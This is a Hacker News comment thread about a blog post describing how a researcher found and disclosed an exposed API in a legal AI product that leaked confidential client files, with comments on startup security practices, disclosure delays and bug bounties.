Reverse engineering a $1B Legal AI tool exposed 100k+ confidential files

alexschapiro.com

228 points by bearsyankees 2 hours ago


quapster - 2 hours ago

This is the collision between two cultures that were never meant to share the same data: "move fast and duct-tape APIs together" startup engineering, and "if this leaks we ruin people's lives" legal/medical confidentiality.

What's wild is that nothing here is exotic: subdomain enumeration, unauthenticated API, over-privileged token, minified JS leaking internals. This is a 2010-level bug pattern wrapped in 2025 AI hype. The only truly "AI" part is that centralizing all documents for model training drastically raises the blast radius when you screw up.

The economic incentive is obvious: if your pitch deck is "we'll ingest everything your firm has ever touched and make it searchable/AI-ready", you win deals by saying yes to data access and integrations, not by saying no. Least privilege, token scoping, and proper isolation are friction in the sales process, so they get bolted on later, if at all.

The scary bit is that lawyers are being sold "AI assistant" but what they're actually buying is "unvetted third party root access to your institutional memory". At that point, the interesting question isn't whether there are more bugs like this, it's how many of these systems would survive a serious red-team exercise by anyone more motivated than a curious blogger.

mattfrommars - 7 minutes ago

This might be off topic since we are in topic of AI tool and on HackerNews.

I've been pondering a long time how does one build a startup company in domain they are not familiar with but ... Just have this urge to 'crave a pie' in this space. For the longest time, I had this dream of starting or building a 'AI Legal Tech Company' -- big issue is, I don't work in legal space at all. I did some cold reach on lawfirm related forums which did not take any traction.

I later searched around and came across the term, 'case management software'. From what I know, this is what Cilo fundamentally is and make millions if not billion.

This was close to two years or 1.5 years ago and since then, I stopped thinking about it because of this understanding or belief I have, "how can I do a startup in legal when I don't work in this domain" But when I look around, I have seen people who start companies in totally unrelated industry. From starting a 'dental tech's company to, if I'm not mistaken, the founder of hugging face doesn't seem to have PHD in AI/ML and yet founded HuggingFace.

Given all said, how does one start a company in unrelated domain? Say I want to start another case management system or attempt to clone FileVine, do I first read up what case management software is or do I cold reach to potential lawfirm who would partner up to built a SAAS from scratch? Other school of thought goes like, "find customer before you have a product to validate what you want to build", how does this realistically work?

Apologies for the scattered thoughts...

icyfox - 2 hours ago

I'm always a bit surprised how long it can take to triage and fix these pretty glaring security vulnerabilities. October 27, 2025 disclosure and November 4, 2025 email confirmation seems like a long time to have their entire client file system exposed. Sure the actual bug ended up being (what I imagine to be) a <1hr fix plus the time for QA testing to make sure it didn't break anything.

Is the issue that people aren't checking their security@ email addresses? People are on holiday? These emails get so much spam it's really hard to separate the noise from the legit signal? I'm genuinely curious.

fallinditch - 3 minutes ago

> ... after looking through minified code, which SUCKS to do ...

AI tends to be good at un-minifying code.

sys32768 - an hour ago

I work for a finance firm and everyone is wondering why we can store reams of client data with SaaS Company X, but not upload a trust document or tax return to AI SaaS Company Y.

My argument is we're in the Wild West with AI and this stuff is being built so fast with so many evolving tools that corners are being cut even when they don't realize it.

This article demonstrates that, but it does sort of beg the question as to why not trust one vs the other when they both promise the same safeguards.

canopi - 2 hours ago

The first thing that comes to my mind is SOC2 HIPAA and the whole security theater.

I am one of the engineers that had to suffer through countless screenshots and forms to get these because they show that you are compliant and safe. While the real impactful things are ignored

valbaca - 14 minutes ago

Given the absurd amount startups I see lately that have the words "healthcare" and "AI", I'm actually incredibly concerned that in just a couple of months we're going to have an multiple, enormous HIPAA-data disasters

Just search "healthcare" in https://news.ycombinator.com/item?id=46108941

kylecazar - 2 hours ago

If they have a billion dollar valuation, this fairly basic (and irresponsible) vulnerability could have cost them a billion dollars. If someone with malice had been in your shoes, in that industry, this probably wouldn't have been recoverable. Imagine a firm's entire client communications and discovery posted online.

They should have given you some money.

yieldcrv - 3 minutes ago

I've worked in several "agentic" roles this year alone (I'm very poachable lol)

and otherwise well structured engineering orgs have lost their goddamn minds with move fast and break things

because they're worried that OpenAI/Google/Meta/Amazon/Anthropic will release the tool they're working on tomorrow

literally all of them are like this

richwater - 24 minutes ago

Of course there will be no accountability or punishment.

jacquesm - 2 hours ago

That doesn't surprise me one bit. Just think about all the confidential information that people post into their Chatgpt and Claude sessions. You could probably keep the legal system busy for the next century on a couple of days of that.

lupire - 23 minutes ago

Who is Margolis, and are they happy that OP publicly announced accessing all their confidential files?

Clever work by OP. Surely there is automatic prober tool that already hacked this product?

Invictus0 - 2 hours ago

This guy didn't even get paid for this? We need a law that establishes mandatory payments for cybersecurity bounty hunters.

imvetri - an hour ago

Legal attacks engineering - font type license fee on japan consumers. Engineering attacks legal - AI info dump in above post.

How does above sound like and what kind of professional write like that?

chunk1000 - 2 hours ago

Thank you bearsyankees for keeping us informed.

observationist - 2 hours ago

I think this class of problems can be protected against.

It's become clear that the first and most important and most valuable agent, or team of agents, to build is the one that responsibly and diligently lays out the opsec framework for whatever other system you're trying to automate.

A meta-security AI framework, cursor for opsec, would be the best, most valuable general purpose AI tool any company could build, imo. Everything from journalism to law to coding would immediately benefit, and it'd provide invaluable data for post training, reducing the overall problematic behaviors in the underlying models.

Move fast and break things is a lot more valuable if you have a red team mechanism that scales with the product. Who knows how many facepalm level failures like this are out there?